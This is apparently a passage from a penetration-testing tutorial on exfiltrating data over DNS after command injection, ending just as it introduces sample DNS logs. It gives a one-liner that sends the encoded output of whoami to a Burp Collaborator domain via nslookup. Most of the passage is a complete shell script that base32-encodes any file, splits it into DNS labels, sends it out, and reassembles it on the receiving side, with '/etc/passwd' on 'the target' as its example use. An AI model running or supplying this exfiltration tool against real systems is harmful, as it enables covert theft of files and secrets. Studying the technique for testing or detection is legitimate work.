Here’s our bash command:
a=$(whoami|base32|tr -d =);nslookup $a.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com
Let's break it down. The first part is a=$(whoami|base32|tr -d =):
- $(…): the dollar sign and parentheses run the command (or pipeline) between the parentheses and store its output in a variable (a, in this case)
- whoami prints the current user, here www-data, followed by a newline
- Piping that to base32 gives O53XOLLEMF2GCCQ= (the trailing newline from whoami is encoded too, which is why the output ends in CCQ= rather than after the eight letters of the name). base32 is chosen over base64 because its alphabet (A-Z and 2-7) contains only characters that are valid in a DNS label and that survive the case folding some resolvers apply
- tr -d = deletes the "=" padding, which is not a valid hostname character
- $a now contains O53XOLLEMF2GCCQ
Then run:
nslookup O53XOLLEMF2GCCQ.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com
If you do not have a domain and DNS server of your own, you can use Burp Collaborator to obtain a domain like the one above and inspect the queries that arrive for it.
You can also automate this with a loop to exfiltrate longer files and more information. Each DNS label is limited to 63 characters (and a full name to 253), so a single short value such as a username fits in one label; for anything longer, split the encoded output into 63-character chunks and issue one lookup per chunk:
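The loop itself is not shown on this page, so here is an added example (my code, not the original author's) of the chunked version. It base32-encodes a file, splits the result into 63-character labels, prefixes each label with a sequence number so the receiver can reorder queries that arrive out of order (a design choice of mine; the page's single-label form has no such prefix), and issues one nslookup per chunk. The receiving side is included because base32 -d refuses unpadded input, so the "=" padding that tr stripped has to be restored before decoding, and because resolvers may lowercase the name on the way through. The domain is the Collaborator payload from the command above and stands in for your own; the function names are mine. It assumes GNU coreutils (for base32) and a POSIX shell.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes GNU coreutils (base32)
# and a POSIX shell. COLLAB is a placeholder: set it to your own
# Collaborator / OAST domain before use.
COLLAB="${COLLAB:-3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com}"

# base32-encode stdin and strip the "=" padding and line wrapping, leaving
# only A-Z and 2-7, all of which are legal in a DNS label.
b32_encode() {
  base32 | tr -d '=\n'
}

# Restore the padding that b32_encode removed (base32 -d insists on it)
# and decode. Padding brings the length up to a multiple of 8.
b32_decode() {
  s="$1"
  pad=$(( (8 - ${#s} % 8) % 8 ))
  eq=""
  while [ "$pad" -gt 0 ]; do
    eq="$eq="
    pad=$((pad - 1))
  done
  printf '%s%s' "$s" "$eq" | base32 -d
}

# Split a string into chunks of at most 63 characters (the DNS label limit),
# one per line.
chunk_labels() {
  s="$1"
  while [ -n "$s" ]; do
    printf '%s\n' "$s" | cut -c1-63
    s=$(printf '%s' "$s" | cut -c64-)
  done
}

# Build one query name per chunk: <seq>.<chunk>.<domain>. The sequence
# number lets the receiver reorder queries that arrive out of order or
# are retried by an intermediate resolver.
build_queries() {
  enc=$(b32_encode < "$1")
  i=0
  chunk_labels "$enc" | while IFS= read -r chunk; do
    printf '%s.%s.%s\n' "$i" "$chunk" "$COLLAB"
    i=$((i + 1))
  done
}

# Send the file: one DNS lookup per chunk. The data travels in the query
# name, so the answer (and any lookup failure) does not matter.
exfil_file() {
  build_queries "$1" | while IFS= read -r name; do
    nslookup "$name" >/dev/null 2>&1
  done
}

# Receiver side: feed the query names seen in the Collaborator log (one per
# line) on stdin, reorder by sequence number, join the chunks, upper-case
# them in case a resolver folded the case, and decode.
reassemble() {
  joined=$(sort -t. -k1,1n | cut -d. -f2 | tr -d '\n' | tr 'a-z' 'A-Z')
  b32_decode "$joined"
}
```

Usage on the target is `exfil_file /etc/passwd` (with COLLAB set); on your side, paste the logged names into `reassemble` to recover the file. A sequence number per label is cheap (one or two characters) and worth it: Collaborator shows queries in arrival order, which is not guaranteed to be send order once recursive resolvers and retries are involved.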
Here is what the DNS logs would look like: